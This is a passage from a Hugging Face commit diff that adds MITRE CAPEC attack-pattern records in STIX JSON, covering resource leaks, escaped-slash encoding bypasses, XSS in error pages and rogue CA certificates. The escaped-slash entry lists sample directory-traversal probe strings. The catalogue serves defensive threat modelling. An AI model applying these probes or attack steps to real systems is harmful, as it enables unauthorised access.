Hugging Face's logo

khoicrtp
/
test_scratch

Model card Files Community
khoicrtp commited on
Commit
5ceca98
1 Parent(s): 953210f

updated

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json +64 -0
  2. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json +125 -0
  3. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json +54 -0
  4. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55.json +90 -0
  5. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--16a18e0c-676c-4fac-89c7-6a7ab96666f4.json +90 -0
  6. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4.json +65 -0
  7. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json +96 -0
  8. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b.json +90 -0
  9. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17.json +100 -0
  10. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--25946b99-9827-40a6-99a4-ca15eea08e5d.json +63 -0
  11. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--25aafa9d-84f2-4f9d-a19e-280e20bcd16c.json +90 -0
  12. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a.json +138 -0
  13. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90.json +29 -0
  14. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6.json +73 -0
  15. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b.json +78 -0
  16. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee.json +29 -0
  17. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643.json +53 -0
  18. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009.json +57 -0
  19. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca.json +113 -0
  20. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0.json +80 -0
  21. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42.json +60 -0
  22. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b.json +89 -0
  23. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348.json +79 -0
  24. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80.json +69 -0
  25. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb.json +43 -0
  26. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f.json +79 -0
  27. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e017307-7bab-419b-972c-8dae9e089572.json +44 -0
  28. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74.json +55 -0
  29. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03.json +60 -0
  30. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4.json +92 -0
  31. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497.json +176 -0
  32. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f.json +29 -0
  33. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2fb09678-092a-490d-b2da-fff20a696219.json +29 -0
  34. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f.json +73 -0
  35. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1.json +81 -0
  36. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93.json +41 -0
  37. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--30b081a0-bf20-432b-8211-a340bbd04731.json +74 -0
  38. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c.json +66 -0
  39. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4.json +95 -0
  40. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--3190ba0e-d2d1-4007-985d-5f3aa517aaed.json +79 -0
  41. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--31b90554-68d8-4950-ac45-89c915a30716.json +57 -0
  42. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--323ed142-7793-413d-838f-72626caf58da.json +59 -0
  43. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2.json +79 -0
  44. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed.json +53 -0
  45. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--33d398f3-dd5f-4e9f-ba4b-5ed8f189a78d.json +29 -0
  46. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132.json +60 -0
  47. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf.json +82 -0
  48. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e.json +59 -0
  49. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6.json +129 -0
  50. cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8.json +103 -0
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113.json ADDED
@@ -0,0 +1,64 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--64c461a3-8784-4465-a1dd-bce2d2a1283d",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-131",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/131.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-404",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/404.html"
18
+ },
19
+ {
20
+ "description": "Endpoint Denial of Service",
21
+ "external_id": "T1499",
22
+ "source_name": "ATTACK",
23
+ "url": "https://attack.mitre.org/wiki/Technique/T1499"
24
+ },
25
+ {
26
+ "description": "Denial of Service",
27
+ "external_id": "10",
28
+ "source_name": "WASC",
29
+ "url": "http://projects.webappsec.org/Denial-of-Service"
30
+ }
31
+ ],
32
+ "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113",
33
+ "modified": "2022-02-22T00:00:00.000Z",
34
+ "name": "Resource Leak Exposure",
35
+ "object_marking_refs": [
36
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
37
+ ],
38
+ "type": "attack-pattern",
39
+ "x_capec_abstraction": "Meta",
40
+ "x_capec_consequences": {
41
+ "Availability": [
42
+ "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)",
43
+ "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)"
44
+ ]
45
+ },
46
+ "x_capec_domains": [
47
+ "Software"
48
+ ],
49
+ "x_capec_extended_description": "\n <xhtml:p>Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.</xhtml:p>\n <xhtml:p>In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.</xhtml:p>\n <xhtml:p>Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.</xhtml:p>\n ",
50
+ "x_capec_likelihood_of_attack": "Medium",
51
+ "x_capec_prerequisites": [
52
+ "The target must have a resource leak that the adversary can repeatedly trigger."
53
+ ],
54
+ "x_capec_resources_required": [
55
+ "None: No specialized resources are required to execute this type of attack."
56
+ ],
57
+ "x_capec_status": "Stable",
58
+ "x_capec_typical_severity": "Medium",
59
+ "x_capec_version": "3.9"
60
+ }
61
+ ],
62
+ "spec_version": "2.0",
63
+ "type": "bundle"
64
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json ADDED
@@ -0,0 +1,125 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--a4278d02-bf63-4701-a693-0b096a07a36d",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-78",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/78.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-180",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/180.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-181",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/181.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-173",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/173.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-172",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/172.html"
33
+ },
34
+ {
35
+ "external_id": "CWE-73",
36
+ "source_name": "cwe",
37
+ "url": "http://cwe.mitre.org/data/definitions/73.html"
38
+ },
39
+ {
40
+ "external_id": "CWE-22",
41
+ "source_name": "cwe",
42
+ "url": "http://cwe.mitre.org/data/definitions/22.html"
43
+ },
44
+ {
45
+ "external_id": "CWE-74",
46
+ "source_name": "cwe",
47
+ "url": "http://cwe.mitre.org/data/definitions/74.html"
48
+ },
49
+ {
50
+ "external_id": "CWE-20",
51
+ "source_name": "cwe",
52
+ "url": "http://cwe.mitre.org/data/definitions/20.html"
53
+ },
54
+ {
55
+ "external_id": "CWE-697",
56
+ "source_name": "cwe",
57
+ "url": "http://cwe.mitre.org/data/definitions/697.html"
58
+ },
59
+ {
60
+ "external_id": "CWE-707",
61
+ "source_name": "cwe",
62
+ "url": "http://cwe.mitre.org/data/definitions/707.html"
63
+ },
64
+ {
65
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
66
+ "external_id": "REF-1",
67
+ "source_name": "reference_from_CAPEC"
68
+ }
69
+ ],
70
+ "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f",
71
+ "modified": "2022-09-29T00:00:00.000Z",
72
+ "name": "Using Escaped Slashes in Alternate Encoding",
73
+ "object_marking_refs": [
74
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
75
+ ],
76
+ "type": "attack-pattern",
77
+ "x_capec_abstraction": "Detailed",
78
+ "x_capec_child_of_refs": [
79
+ "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce"
80
+ ],
81
+ "x_capec_consequences": {
82
+ "Access_Control": [
83
+ "Bypass Protection Mechanism"
84
+ ],
85
+ "Authorization": [
86
+ "Bypass Protection Mechanism"
87
+ ],
88
+ "Availability": [
89
+ "Resource Consumption (Denial of Service)",
90
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
91
+ ],
92
+ "Confidentiality": [
93
+ "Read Data",
94
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
95
+ "Bypass Protection Mechanism"
96
+ ],
97
+ "Integrity": [
98
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
99
+ ]
100
+ },
101
+ "x_capec_domains": [
102
+ "Software"
103
+ ],
104
+ "x_capec_example_instances": [
105
+ "\n <xhtml:p>For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">/ yields /\\/ yields /</xhtml:div>\n ",
106
+ "\n <xhtml:p>An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">CWD ..\\/..\\/..\\/..\\/winnt</xhtml:div>\n <xhtml:p>which converts in many cases to</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">CWD ../../../../winnt</xhtml:div>\n <xhtml:p>To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">int main(int argc, char* argv[]){<xhtml:div style=\"margin-left:1em;\">puts(\"\\/ \\\\ \\? \\. \\| \");return 0;</xhtml:div>\n }</xhtml:div>\n <xhtml:p>produces the output</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">/ \\ ? . |</xhtml:div>\n <xhtml:p>Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt</xhtml:div>\n "
107
+ ],
108
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for user-controllable inputs: </b>Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.</td></tr><tr><td>Manually inspect the application to find entry points.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Probe entry points to locate vulnerabilities: </b>The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Escape a special character with a backslash to bypass input validation.</td></tr><tr><td>Try different encodings of both the backslash and the special character to see if this bypasses input validation</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Manipulate input: </b>Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.</p></li></ol></div>",
109
+ "x_capec_likelihood_of_attack": "High",
110
+ "x_capec_prerequisites": [
111
+ "The application accepts the backlash character as escape character.",
112
+ "The application server does incomplete input data decoding, filtering and validation."
113
+ ],
114
+ "x_capec_skills_required": {
115
+ "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.",
116
+ "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability."
117
+ },
118
+ "x_capec_status": "Draft",
119
+ "x_capec_typical_severity": "High",
120
+ "x_capec_version": "3.9"
121
+ }
122
+ ],
123
+ "spec_version": "2.0",
124
+ "type": "bundle"
125
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json ADDED
@@ -0,0 +1,54 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--ed5f9cb2-42bb-4dfb-8463-7cc176d00df4",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-198",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/198.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-81",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/81.html"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2",
21
+ "modified": "2022-09-29T00:00:00.000Z",
22
+ "name": "XSS Targeting Error Pages",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Detailed",
28
+ "x_capec_child_of_refs": [
29
+ "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a",
30
+ "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f",
31
+ "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b"
32
+ ],
33
+ "x_capec_domains": [
34
+ "Software",
35
+ "Software",
36
+ "Software"
37
+ ],
38
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for user-controllable inputs as URL parameters: </b>Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of the web application.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Cause application to return error page: </b>The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.</td></tr><tr><td>Use a proxy tool to record results of manual input of XSS probes in known URLs.</td></tr><tr><td>Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors</td></tr></tbody></table><li> <p> <b>Craft malicious XSS URL: </b>Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Change a URL parameter to include a malicious script tag.</td></tr><tr><td>Send information gathered from the malicious script to a remote endpoint.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Get victim to click URL: </b>In order for the attack to be successful, the victim needs to access the malicious URL.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.</td></tr><tr><td>Put the malicious URL on a public forum, where many victims might accidentally click the link.</td></tr></tbody></table></ol></div>",
39
+ "x_capec_extended_description": "\n <xhtml:p>When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.</xhtml:p>\n ",
40
+ "x_capec_prerequisites": [
41
+ "A third party web server which fails to adequately sanitize messages sent in error pages.",
42
+ "The victim must be made to execute a query crafted by the adversary which results in the infected error report."
43
+ ],
44
+ "x_capec_resources_required": [
45
+ "None: No specialized resources are required to execute this type of attack."
46
+ ],
47
+ "x_capec_status": "Draft",
48
+ "x_capec_typical_severity": "Medium",
49
+ "x_capec_version": "3.9"
50
+ }
51
+ ],
52
+ "spec_version": "2.0",
53
+ "type": "bundle"
54
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55.json ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--c7b7ed0f-0f43-4949-9ad3-0a0c69d34234",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \"to be signed\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-459",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/459.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-327",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/327.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-295",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/295.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-290",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/290.html"
28
+ },
29
+ {
30
+ "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org",
31
+ "external_id": "REF-395",
32
+ "source_name": "reference_from_CAPEC",
33
+ "url": "http://www.phreedom.org/research/rogue-ca/"
34
+ },
35
+ {
36
+ "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12",
37
+ "external_id": "REF-587",
38
+ "source_name": "reference_from_CAPEC",
39
+ "url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref"
40
+ }
41
+ ],
42
+ "id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55",
43
+ "modified": "2022-09-29T00:00:00.000Z",
44
+ "name": "Creating a Rogue Certification Authority Certificate",
45
+ "object_marking_refs": [
46
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
47
+ ],
48
+ "type": "attack-pattern",
49
+ "x_capec_abstraction": "Detailed",
50
+ "x_capec_child_of_refs": [
51
+ "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9"
52
+ ],
53
+ "x_capec_consequences": {
54
+ "Access_Control": [
55
+ "Gain Privileges"
56
+ ],
57
+ "Authentication": [
58
+ "Gain Privileges"
59
+ ]
60
+ },
61
+ "x_capec_domains": [
62
+ "Software"
63
+ ],
64
+ "x_capec_example_instances": [
65
+ "\n <xhtml:b>MD5 Collisions</xhtml:b>\n <xhtml:p>The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.</xhtml:p>See also: CVE-2004-2761",
66
+ "\n <xhtml:b>SHA1 Collisions</xhtml:b>\n <xhtml:p>The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.</xhtml:p>See also: CVE-2005-4900",
67
+ "\n <xhtml:b>PKI Infrastructure vulnerabilities</xhtml:b>\n <xhtml:p>Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.</xhtml:p>\n "
68
+ ],
69
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p> <b>Craft Certificates: </b>The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value.</p></li><li> <p> <b>Send CSR to Certificate Authority: </b>The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key.</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Insert Signed Blob into Unsigned Certificate: </b>The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed.</p></li></ol></div>",
70
+ "x_capec_extended_description": "\n <xhtml:p>Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).</xhtml:p>\n ",
71
+ "x_capec_likelihood_of_attack": "Medium",
72
+ "x_capec_prerequisites": [
73
+ "Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed"
74
+ ],
75
+ "x_capec_resources_required": [
76
+ "Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance",
77
+ "A valid certificate request and a malicious certificate request with identical hash values"
78
+ ],
79
